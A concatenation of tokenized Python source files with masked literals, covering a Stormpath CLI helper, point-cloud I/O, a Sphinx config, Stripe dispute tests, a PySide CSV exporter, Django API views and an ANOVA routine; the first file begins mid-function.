from stormpath . client import Client <EOL> for i , attr in enumerate ( arguments . get ( '<STR_LIT>' ) ) : <EOL> if attr . find ( "<STR_LIT:=>" ) == - <NUM_LIT:1> : <EOL> if attr . startswith ( Client . BASE_URL ) : <EOL> arguments [ '<STR_LIT>' ] [ i ] = '<STR_LIT>' + attr <EOL> else : <EOL> primary_attr = '<STR_LIT:email>' if resource . find ( '<STR_LIT>' ) != - <NUM_LIT:1> else '<STR_LIT:name>' <EOL> arguments [ '<STR_LIT>' ] [ i ] = primary_attr + "<STR_LIT:=>" + attr <EOL> return arguments <EOL> def properly_support_boolean_values ( arguments ) : <EOL> def _txt_to_bool ( val ) : <EOL> ret = '<STR_LIT:true>' if ( val == '<STR_LIT:true>' or val == '<STR_LIT:1>' or val == '<STR_LIT:True>' ) else '<STR_LIT:false>' <EOL> return ret <EOL> arguments [ '<STR_LIT>' ] = _txt_to_bool ( arguments . get ( '<STR_LIT>' ) ) <EOL> arguments [ '<STR_LIT>' ] = _txt_to_bool ( arguments . get ( '<STR_LIT>' ) ) <EOL> return arguments </s>
<s> from . _pcl import * <EOL> import sys <EOL> def load ( path , format = None ) : <EOL> """<STR_LIT>""" <EOL> format = _infer_format ( path , format ) <EOL> p = PointCloud ( ) <EOL> try : <EOL> loader = getattr ( p , "<STR_LIT>" % format ) <EOL> except AttributeError : <EOL> raise ValueError ( "<STR_LIT>" % format ) <EOL> if loader ( _encode ( path ) ) : <EOL> raise IOError ( "<STR_LIT>" <EOL> % ( path , format ) ) <EOL> return p <EOL> def save ( cloud , path , format = None , binary = False ) : <EOL> """<STR_LIT>""" <EOL> format = _infer_format ( path , format ) <EOL> try : <EOL> dumper = getattr ( cloud , "<STR_LIT>" % format ) <EOL> except AttributeError : <EOL> raise ValueError ( "<STR_LIT>" % format ) <EOL> if dumper ( _encode ( path ) , binary ) : <EOL> raise IOError ( "<STR_LIT>" <EOL> % ( path , format ) ) <EOL> def _encode ( path ) : <EOL> if isinstance ( path , bytes ) : <EOL> return path <EOL> else : <EOL> return path . encode ( sys . getfilesystemencoding ( ) ) <EOL> def _infer_format ( path , format ) : <EOL> if format is not None : <EOL> return format . lower ( ) <EOL> for candidate in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> if path . endswith ( "<STR_LIT:.>" + candidate ) : <EOL> return candidate <EOL> raise ValueError ( "<STR_LIT>" % path ) </s>
<s> import os <EOL> import sys <EOL> extensions = [ ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> exclude_trees = [ ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT>' if os . environ . get ( '<STR_LIT>' ) else '<STR_LIT>' <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> latex_elements = { <EOL> '<STR_LIT>' : "<STR_LIT>" . join ( ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) ) , <EOL> } </s>
<s> from django . contrib import admin <EOL> import models <EOL> admin . site . register ( models . User ) </s>
<s> import stripe <EOL> from stripe . test . helper import ( <EOL> StripeResourceTest , DUMMY_DISPUTE , NOW <EOL> ) <EOL> class DisputeTest ( StripeResourceTest ) : <EOL> def test_list_all_disputes ( self ) : <EOL> stripe . Dispute . list ( created = { '<STR_LIT>' : NOW } ) <EOL> self . requestor_mock . request . assert_called_with ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : { '<STR_LIT>' : NOW } , <EOL> } <EOL> ) <EOL> def test_create_dispute ( self ) : <EOL> stripe . Dispute . create ( idempotency_key = '<STR_LIT:foo>' , ** DUMMY_DISPUTE ) <EOL> self . requestor_mock . request . assert_called_with ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> DUMMY_DISPUTE , <EOL> { '<STR_LIT>' : '<STR_LIT:foo>' } , <EOL> ) <EOL> def test_retrieve_dispute ( self ) : <EOL> stripe . Dispute . retrieve ( '<STR_LIT>' ) <EOL> self . requestor_mock . request . assert_called_with ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> { } , <EOL> None <EOL> ) <EOL> def test_update_dispute ( self ) : <EOL> dispute = stripe . Dispute . construct_from ( { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:description>' , <EOL> } , <EOL> } , '<STR_LIT>' ) <EOL> dispute . evidence [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> dispute . evidence [ '<STR_LIT>' ] = '<STR_LIT:text>' <EOL> dispute . save ( ) <EOL> self . requestor_mock . request . assert_called_with ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:text>' , <EOL> } } , <EOL> None <EOL> ) <EOL> def test_close_dispute ( self ) : <EOL> dispute = stripe . Dispute ( id = '<STR_LIT>' ) <EOL> dispute . close ( idempotency_key = '<STR_LIT:foo>' ) <EOL> self . requestor_mock . request . assert_called_with ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> { } , <EOL> { '<STR_LIT>' : '<STR_LIT:foo>' } , <EOL> ) </s>
<s> from PySide . QtCore import * <EOL> from PySide . QtGui import * <EOL> import csv <EOL> from progressbar import ProgressBar <EOL> import codecs <EOL> from pandas import merge , read_csv <EOL> from database import * <EOL> class ExportFileDialog ( QFileDialog ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( ExportFileDialog , self ) . __init__ ( * args , ** kwargs ) <EOL> self . mainWindow = self . parent ( ) <EOL> self . setWindowTitle ( "<STR_LIT>" ) <EOL> self . setAcceptMode ( QFileDialog . AcceptSave ) <EOL> self . setFilter ( "<STR_LIT>" ) <EOL> self . setDefaultSuffix ( "<STR_LIT>" ) <EOL> self . optionBOM = QCheckBox ( "<STR_LIT>" , self ) <EOL> self . optionBOM . setCheckState ( Qt . CheckState . Checked ) <EOL> self . optionWide = QCheckBox ( "<STR_LIT>" , self ) <EOL> self . optionWide . setCheckState ( Qt . CheckState . Unchecked ) <EOL> self . optionAll = QComboBox ( self ) <EOL> self . optionAll . insertItems ( <NUM_LIT:0> , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if self . mainWindow . tree . noneOrAllSelected ( ) : <EOL> self . optionAll . setCurrentIndex ( <NUM_LIT:0> ) <EOL> else : <EOL> self . optionAll . setCurrentIndex ( <NUM_LIT:1> ) <EOL> layout = self . layout ( ) <EOL> row = layout . rowCount ( ) <EOL> layout . addWidget ( QLabel ( '<STR_LIT>' ) , row , <NUM_LIT:0> ) <EOL> layout . addWidget ( self . optionBOM , row , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> layout . addWidget ( QLabel ( '<STR_LIT>' ) , row + <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> layout . addWidget ( self . optionWide , row + <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> layout . addWidget ( QLabel ( '<STR_LIT>' ) , row + <NUM_LIT:2> , <NUM_LIT:0> ) <EOL> layout . addWidget ( self . optionAll , row + <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> self . setLayout ( layout ) <EOL> if self . exec_ ( ) : <EOL> if os . path . isfile ( self . selectedFiles ( ) [ <NUM_LIT:0> ] ) : <EOL> os . remove ( self . selectedFiles ( ) [ <NUM_LIT:0> ] ) <EOL> output = open ( self . selectedFiles ( ) [ <NUM_LIT:0> ] , '<STR_LIT:wb>' ) <EOL> try : <EOL> if self . optionBOM . isChecked ( ) and not self . optionWide . isChecked ( ) : <EOL> output . write ( codecs . BOM_UTF8 ) <EOL> if self . optionAll . currentIndex ( ) == <NUM_LIT:0> : <EOL> self . exportAllNodes ( output ) <EOL> else : <EOL> self . exportSelectedNodes ( output ) <EOL> finally : <EOL> output . close ( ) <EOL> if self . optionWide . isChecked ( ) : <EOL> self . convertToWideFormat ( self . selectedFiles ( ) [ <NUM_LIT:0> ] ) <EOL> def exportSelectedNodes ( self , output ) : <EOL> progress = ProgressBar ( "<STR_LIT>" , self . mainWindow ) <EOL> indexes = self . mainWindow . tree . selectedIndexesAndChildren ( ) <EOL> progress . setMaximum ( len ( indexes ) ) <EOL> try : <EOL> writer = csv . writer ( output , delimiter = '<STR_LIT:;>' , quotechar = '<STR_LIT:">' , quoting = csv . QUOTE_ALL , doublequote = True , <EOL> lineterminator = '<STR_LIT:\r\n>' ) <EOL> row = [ unicode ( val ) . encode ( "<STR_LIT:utf-8>" ) for val in self . mainWindow . tree . treemodel . getRowHeader ( ) ] <EOL> writer . writerow ( row ) <EOL> for no in range ( len ( indexes ) ) : <EOL> if progress . wasCanceled : <EOL> break <EOL> row = [ unicode ( val ) . encode ( "<STR_LIT:utf-8>" ) for val in self . mainWindow . tree . treemodel . getRowData ( indexes [ no ] ) ] <EOL> writer . writerow ( row ) <EOL> progress . step ( ) <EOL> finally : <EOL> progress . close ( ) <EOL> def exportAllNodes ( self , output ) : <EOL> progress = ProgressBar ( "<STR_LIT>" , self . mainWindow ) <EOL> progress . setMaximum ( Node . query . count ( ) ) <EOL> try : <EOL> writer = csv . writer ( output , delimiter = '<STR_LIT:;>' , quotechar = '<STR_LIT:">' , quoting = csv . QUOTE_ALL , doublequote = True , <EOL> lineterminator = '<STR_LIT:\r\n>' ) <EOL> row = [ "<STR_LIT>" , "<STR_LIT:id>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> for key in self . mainWindow . tree . treemodel . customcolumns : <EOL> row . append ( key ) <EOL> writer . writerow ( row ) <EOL> page = <NUM_LIT:0> <EOL> while True : <EOL> allnodes = Node . query . offset ( page * <NUM_LIT> ) . limit ( <NUM_LIT> ) <EOL> if allnodes . count ( ) == <NUM_LIT:0> : <EOL> break <EOL> for node in allnodes : <EOL> if progress . wasCanceled : <EOL> break <EOL> row = [ node . level , node . id , node . parent_id , node . objectid_encoded , node . objecttype , <EOL> node . querystatus , node . querytime , node . querytype ] <EOL> for key in self . mainWindow . tree . treemodel . customcolumns : <EOL> row . append ( node . getResponseValue ( key , "<STR_LIT:utf-8>" ) ) <EOL> writer . writerow ( row ) <EOL> progress . step ( ) <EOL> if progress . wasCanceled : <EOL> break <EOL> else : <EOL> page += <NUM_LIT:1> <EOL> finally : <EOL> progress . close ( ) <EOL> def convertToWideFormat ( self , filename ) : <EOL> def flattenTable ( fulltable , levelcol , idcol , parentidcol , countchildren , removeempty ) : <EOL> fulltable [ [ levelcol ] ] = fulltable [ [ levelcol ] ] . astype ( int ) <EOL> levels = dict ( list ( fulltable . groupby ( levelcol ) ) ) <EOL> minlevel = fulltable . level . min ( ) <EOL> for level , data in sorted ( levels . iteritems ( ) ) : <EOL> if level == minlevel : <EOL> data = data . add_prefix ( '<STR_LIT>' . format ( level ) ) <EOL> flattable = data <EOL> else : <EOL> for col_countchildren in countchildren : <EOL> children = data [ parentidcol ] . groupby ( [ data [ parentidcol ] , data [ col_countchildren ] ] ) . count ( ) <EOL> children = children . unstack ( col_countchildren ) <EOL> children [ '<STR_LIT>' ] = children . sum ( axis = <NUM_LIT:1> ) <EOL> children = children . add_prefix ( '<STR_LIT>' . format ( level - <NUM_LIT:1> , col_countchildren ) ) <EOL> leftkey = '<STR_LIT>' . format ( level - <NUM_LIT:1> ) <EOL> flattable = merge ( flattable , children , how = '<STR_LIT:left>' , left_on = leftkey , right_index = True ) <EOL> flattable [ children . columns . values . tolist ( ) ] = flattable [ children . columns . values . tolist ( ) ] . fillna ( <NUM_LIT:0> ) . astype ( int ) <EOL> data [ '<STR_LIT>' ] = data . groupby ( parentidcol ) . cumcount ( ) <EOL> leftkey = '<STR_LIT>' . format ( level - <NUM_LIT:1> , idcol ) <EOL> rightkey = '<STR_LIT>' . format ( level , parentidcol ) <EOL> data = data . drop ( [ levelcol ] , axis = <NUM_LIT:1> ) <EOL> data = data . add_prefix ( '<STR_LIT>' . format ( level ) ) <EOL> flattable = merge ( flattable , data , how = "<STR_LIT>" , left_on = leftkey , right_on = rightkey ) <EOL> if removeempty : <EOL> flattable = flattable . dropna ( axis = <NUM_LIT:1> , how = '<STR_LIT:all>' ) <EOL> return flattable <EOL> try : <EOL> data = read_csv ( filename , sep = "<STR_LIT:;>" , encoding = '<STR_LIT:utf-8>' , dtype = str ) <EOL> newdata = flattenTable ( data , '<STR_LIT>' , '<STR_LIT:id>' , '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , False ) <EOL> outfile = open ( filename , '<STR_LIT:wb>' ) <EOL> try : <EOL> if self . optionBOM . isChecked ( ) : <EOL> outfile . write ( codecs . BOM_UTF8 ) <EOL> newdata . to_csv ( outfile , sep = '<STR_LIT:;>' , index = False , encoding = "<STR_LIT:utf-8>" ) <EOL> finally : <EOL> outfile . close ( ) <EOL> except Exception as e : <EOL> self . mainWindow . logmessage ( e ) </s>
<s> import io , subprocess , sqlite3 , collections , datetime , re , sys , operator <EOL> def run ( args , db ) : <EOL> cmd = '<STR_LIT>' <EOL> table = '<STR_LIT>' <EOL> out_structure = """<STR_LIT>""" . split ( '<STR_LIT:\n>' ) <EOL> class Column : <EOL> def __init__ ( s , ** kwargs ) : <EOL> for k , v in kwargs . items ( ) : <EOL> setattr ( s , k , v ) <EOL> columns = [ ] <EOL> for out , field , type in map ( lambda s : s . split ( ) , out_structure ) : <EOL> columns . append ( Column ( out = out , field = field , type = type ) ) <EOL> args . extend ( [ '<STR_LIT>' , '<STR_LIT:U+002C>' . join ( [ col . out for col in columns ] ) ] ) <EOL> args . append ( '<STR_LIT>' ) <EOL> bout = subprocess . check_output ( [ cmd ] + args ) <EOL> out_lines = bout . decode ( errors = '<STR_LIT>' ) . split ( '<STR_LIT:\n>' ) <EOL> out_lines . pop ( ) <EOL> header = out_lines . pop ( <NUM_LIT:0> ) <EOL> spaces = [ ix for ix , c in enumerate ( header ) if c == '<STR_LIT:U+0020>' ] <EOL> for line in out_lines : <EOL> spaces = [ ix for ix in spaces if line [ ix ] == '<STR_LIT:U+0020>' ] <EOL> header = '<STR_LIT>' . join ( '<STR_LIT:*>' if ix in spaces and ( ( ix - <NUM_LIT:1> ) not in spaces ) else c for ix , c in enumerate ( header ) ) <EOL> header += '<STR_LIT:U+0020>' * ( max ( map ( len , out_lines ) ) - len ( header ) ) <EOL> header = re . sub ( '<STR_LIT>' , lambda mo : '<STR_LIT:U+0020>' + mo . group ( <NUM_LIT:1> ) , header ) <EOL> headers = header . split ( '<STR_LIT:*>' ) <EOL> assert len ( headers ) == len ( columns ) , '<STR_LIT>' . format ( len ( headers ) , len ( columns ) ) <EOL> sql = '<STR_LIT>' . format ( table = table , columns = '<STR_LIT:U+002C>' . join ( [ '<STR_LIT>' . format ( col . field , col . type ) for col in columns ] ) ) <EOL> db . execute ( sql ) <EOL> for line in out_lines : <EOL> h_start = <NUM_LIT:0> <EOL> h_end = <NUM_LIT:0> <EOL> vals = [ ] <EOL> for h in headers : <EOL> h_end += len ( h ) <EOL> val = line [ h_start : h_end ] . strip ( ) <EOL> vals . append ( val ) <EOL> h_start = h_end + <NUM_LIT:1> <EOL> h_end = h_start <EOL> q_marks = '<STR_LIT:U+002C>' . join ( '<STR_LIT:?>' * len ( vals ) ) <EOL> db . execute ( '<STR_LIT>' . format ( table = table , q = q_marks ) , tuple ( vals ) ) </s>
<s> import json <EOL> from django . http import ( <EOL> HttpResponse , <EOL> HttpResponseForbidden ) <EOL> from django . views . generic import View <EOL> class BaseAPIView ( View ) : <EOL> resource = None <EOL> def get_response ( self , data ) : <EOL> status = <NUM_LIT> if '<STR_LIT:error>' in data else <NUM_LIT:200> <EOL> return HttpResponse ( json . dumps ( data ) , status = status , <EOL> mimetype = '<STR_LIT:application/json>' ) <EOL> def dispatch ( self , request , * args , ** kwargs ) : <EOL> if request . method != '<STR_LIT:GET>' : <EOL> return HttpResponseForbidden ( ) <EOL> request . _user = None <EOL> if self . resource . needs_authorization : <EOL> request . _user = self . resource . authorize ( request ) <EOL> if not request . _user : <EOL> return HttpResponseForbidden ( ) <EOL> return super ( BaseAPIView , self ) . dispatch ( request , * args , ** kwargs ) <EOL> class ListView ( BaseAPIView ) : <EOL> def get ( self , request , * args , ** kwargs ) : <EOL> return self . get_response ( <EOL> self . resource . get_list ( <EOL> request . GET . dict ( ) , <EOL> user = request . _user ) ) <EOL> class ItemView ( BaseAPIView ) : <EOL> def get ( self , request , _id , * args , ** kwargs ) : <EOL> return self . get_response ( <EOL> self . resource . get_one ( <EOL> request . GET . dict ( ) , _id , request . _user ) ) </s>
<s> if <NUM_LIT:1> : <EOL> import numpy as N <EOL> from statlib import pstat , stats <EOL> from pstat import * <EOL> from stats import * <EOL> from numpy import linalg as LA <EOL> import operator , math <EOL> def aanova ( data , effects = [ '<STR_LIT:A>' , '<STR_LIT:B>' , '<STR_LIT:C>' , '<STR_LIT:D>' , '<STR_LIT:E>' , '<STR_LIT:F>' , '<STR_LIT>' , '<STR_LIT:H>' , '<STR_LIT:I>' , '<STR_LIT>' , '<STR_LIT>' ] ) : <EOL> """<STR_LIT>""" <EOL> global alluniqueslist , Nlevels , Nfactors , Nsubjects , Nblevels , Nallsources <EOL> global Bscols , Bbetweens , SSlist , SSsources , DM , DN , Bwonly_sources , D <EOL> global Bwithins , alleffects , alleffsources <EOL> outputlist = [ ] <EOL> SSbtw = [ ] <EOL> SSbtwsources = [ ] <EOL> SSwb = [ ] <EOL> SSwbsources = [ ] <EOL> alleffects = [ ] <EOL> alleffsources = [ ] <EOL> SSlist = [ ] <EOL> SSsources = [ ] <EOL> print <EOL> variables = <NUM_LIT:1> <EOL> if type ( data ) != type ( [ ] ) : <EOL> data = data . tolist ( ) <EOL> alluniqueslist = [ <NUM_LIT:0> ] * ( len ( data [ <NUM_LIT:0> ] ) - variables ) <EOL> Nlevels = [ <NUM_LIT:0> ] * ( len ( data [ <NUM_LIT:0> ] ) - variables ) <EOL> for column in range ( len ( Nlevels ) ) : <EOL> alluniqueslist [ column ] = pstat . unique ( pstat . colex ( data , column ) ) <EOL> Nlevels [ column ] = len ( alluniqueslist [ column ] ) <EOL> Ncells = N . multiply . reduce ( Nlevels [ <NUM_LIT:1> : ] ) <EOL> Nfactors = len ( Nlevels [ <NUM_LIT:1> : ] ) <EOL> Nallsources = <NUM_LIT:2> ** ( Nfactors + <NUM_LIT:1> ) <EOL> Nsubjects = len ( alluniqueslist [ <NUM_LIT:0> ] ) <EOL> Bwithins = findwithin ( data ) <EOL> Bbetweens = ~ Bwithins & ( Nallsources - <NUM_LIT:1> ) - <NUM_LIT:1> <EOL> Wcolumns = makelist ( Bwithins , Nfactors + <NUM_LIT:1> ) <EOL> Wscols = [ <NUM_LIT:0> ] + Wcolumns <EOL> Bscols = makelist ( Bbetweens + <NUM_LIT:1> , Nfactors + <NUM_LIT:1> ) <EOL> Nwifactors = len ( Wscols ) - <NUM_LIT:1> <EOL> Nwlevels = N . take ( N . array ( Nlevels ) , Wscols ) <EOL> Nbtwfactors = len ( Bscols ) - <NUM_LIT:1> <EOL> Nblevels = N . take ( N . array ( Nlevels ) , Bscols ) <EOL> Nwsources = <NUM_LIT:2> ** Nwifactors - <NUM_LIT:1> <EOL> Nbsources = Nallsources - Nwsources <EOL> M = pstat . collapse ( data , Bscols , - <NUM_LIT:1> , None , None , mean ) <EOL> Marray = N . zeros ( Nblevels [ <NUM_LIT:1> : ] , '<STR_LIT:f>' ) <EOL> Narray = N . zeros ( Nblevels [ <NUM_LIT:1> : ] , '<STR_LIT:f>' ) <EOL> for row in M : <EOL> idx = [ ] <EOL> for i in range ( len ( row [ : - <NUM_LIT:1> ] ) ) : <EOL> idx . append ( alluniqueslist [ Bscols [ i ] ] . index ( row [ i ] ) ) <EOL> idx = idx [ <NUM_LIT:1> : ] <EOL> Marray [ idx ] = Marray [ idx ] + row [ - <NUM_LIT:1> ] <EOL> Narray [ idx ] = Narray [ idx ] + <NUM_LIT:1> <EOL> Marray = Marray / Narray <EOL> coefflist = [ [ [ <NUM_LIT:1> ] ] , <EOL> [ [ - <NUM_LIT:1> , <NUM_LIT:1> ] ] , <EOL> [ [ - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , - <NUM_LIT:2> , <NUM_LIT:1> ] ] , <EOL> [ [ - <NUM_LIT:3> , - <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:3> ] , [ <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:1> ] , [ - <NUM_LIT:1> , <NUM_LIT:3> , - <NUM_LIT:3> , <NUM_LIT:1> ] ] , <EOL> [ [ - <NUM_LIT:2> , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , [ <NUM_LIT:2> , - <NUM_LIT:1> , - <NUM_LIT:2> , - <NUM_LIT:1> , <NUM_LIT:2> ] , [ - <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , - <NUM_LIT:2> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , - <NUM_LIT:4> , <NUM_LIT:6> , - <NUM_LIT:4> , <NUM_LIT:1> ] ] , <EOL> [ [ - <NUM_LIT:5> , - <NUM_LIT:3> , - <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> ] , [ <NUM_LIT:5> , - <NUM_LIT:1> , - <NUM_LIT:4> , - <NUM_LIT:4> , - <NUM_LIT:1> , <NUM_LIT:5> ] , [ - <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:4> , - <NUM_LIT:4> , - <NUM_LIT:7> , <NUM_LIT:5> ] , <EOL> [ <NUM_LIT:1> , - <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:2> , - <NUM_LIT:3> , <NUM_LIT:1> ] , [ - <NUM_LIT:1> , <NUM_LIT:5> , - <NUM_LIT:10> , <NUM_LIT:10> , - <NUM_LIT:5> , <NUM_LIT:1> ] ] , <EOL> [ [ - <NUM_LIT:3> , - <NUM_LIT:2> , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , [ <NUM_LIT:5> , <NUM_LIT:0> , - <NUM_LIT:3> , - <NUM_LIT:4> , - <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:5> ] , [ - <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:1> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:3> , - <NUM_LIT:7> , <NUM_LIT:1> , <NUM_LIT:6> , <NUM_LIT:1> , - <NUM_LIT:7> , <NUM_LIT:3> ] , [ - <NUM_LIT:1> , <NUM_LIT:4> , - <NUM_LIT:5> , <NUM_LIT:0> , <NUM_LIT:5> , - <NUM_LIT:4> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , - <NUM_LIT:6> , <NUM_LIT:15> , - <NUM_LIT:20> , <NUM_LIT:15> , - <NUM_LIT:6> , <NUM_LIT:1> ] ] , <EOL> [ [ - <NUM_LIT:7> , - <NUM_LIT:5> , - <NUM_LIT:3> , - <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:7> ] , [ <NUM_LIT:7> , <NUM_LIT:1> , - <NUM_LIT:3> , - <NUM_LIT:5> , - <NUM_LIT:5> , - <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:7> ] , <EOL> [ - <NUM_LIT:7> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:3> , - <NUM_LIT:3> , - <NUM_LIT:7> , - <NUM_LIT:5> , <NUM_LIT:7> ] , [ <NUM_LIT:7> , - <NUM_LIT> , - <NUM_LIT:3> , <NUM_LIT:9> , <NUM_LIT:9> , - <NUM_LIT:3> , - <NUM_LIT> , <NUM_LIT:7> ] , <EOL> [ - <NUM_LIT:7> , <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT:15> , <NUM_LIT:15> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT:7> ] , [ <NUM_LIT:1> , - <NUM_LIT:5> , <NUM_LIT:9> , - <NUM_LIT:5> , - <NUM_LIT:5> , <NUM_LIT:9> , - <NUM_LIT:5> , <NUM_LIT:1> ] , <EOL> [ - <NUM_LIT:1> , <NUM_LIT:7> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:7> , <NUM_LIT:1> ] ] , <EOL> [ [ - <NUM_LIT:4> , - <NUM_LIT:3> , - <NUM_LIT:2> , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] , [ <NUM_LIT> , <NUM_LIT:7> , - <NUM_LIT:8> , - <NUM_LIT> , - <NUM_LIT:20> , - <NUM_LIT> , - <NUM_LIT:8> , <NUM_LIT:7> , <NUM_LIT> ] , <EOL> [ - <NUM_LIT> , <NUM_LIT:7> , <NUM_LIT> , <NUM_LIT:9> , <NUM_LIT:0> , - <NUM_LIT:9> , - <NUM_LIT> , - <NUM_LIT:7> , <NUM_LIT> ] , [ <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT:11> , <NUM_LIT:9> , <NUM_LIT> , <NUM_LIT:9> , - <NUM_LIT:11> , - <NUM_LIT> , <NUM_LIT> ] , <EOL> [ - <NUM_LIT:4> , <NUM_LIT:11> , - <NUM_LIT:4> , - <NUM_LIT:9> , <NUM_LIT:0> , <NUM_LIT:9> , <NUM_LIT:4> , - <NUM_LIT:11> , <NUM_LIT:4> ] , [ <NUM_LIT:4> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> , - <NUM_LIT:20> , <NUM_LIT:1> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT:4> ] , <EOL> [ - <NUM_LIT:1> , <NUM_LIT:6> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:6> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , - <NUM_LIT:8> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:8> , <NUM_LIT:1> ] ] , <EOL> [ [ - <NUM_LIT:9> , - <NUM_LIT:7> , - <NUM_LIT:5> , - <NUM_LIT:3> , - <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:7> , <NUM_LIT:9> ] , [ <NUM_LIT:6> , <NUM_LIT:2> , - <NUM_LIT:1> , - <NUM_LIT:3> , - <NUM_LIT:4> , - <NUM_LIT:4> , - <NUM_LIT:3> , - <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:6> ] , <EOL> [ - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:12> , - <NUM_LIT:12> , - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:3> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ] , <EOL> [ - <NUM_LIT:6> , <NUM_LIT> , - <NUM_LIT:1> , - <NUM_LIT:11> , - <NUM_LIT:6> , <NUM_LIT:6> , <NUM_LIT:11> , <NUM_LIT:1> , - <NUM_LIT> , <NUM_LIT:6> ] , [ <NUM_LIT:3> , - <NUM_LIT:11> , <NUM_LIT:10> , <NUM_LIT:6> , - <NUM_LIT:8> , - <NUM_LIT:8> , <NUM_LIT:6> , <NUM_LIT:10> , - <NUM_LIT:11> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:9> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:9> ] , <EOL> [ <NUM_LIT:1> , - <NUM_LIT:7> , <NUM_LIT:20> , - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT:20> , - <NUM_LIT:7> , <NUM_LIT:1> ] , <EOL> [ - <NUM_LIT:1> , <NUM_LIT:9> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:9> , <NUM_LIT:1> ] ] ] <EOL> dindex = <NUM_LIT:0> <EOL> NDs = [ <NUM_LIT:0> ] * Nwsources <EOL> for source in range ( Nwsources ) : <EOL> if subset ( source , Bwithins ) : <EOL> NDs [ dindex ] = numlevels ( source , Nlevels ) <EOL> dindex = dindex + <NUM_LIT:1> <EOL> cdata = pstat . collapse ( data , range ( Nfactors + <NUM_LIT:1> ) , - <NUM_LIT:1> , None , None , mean ) 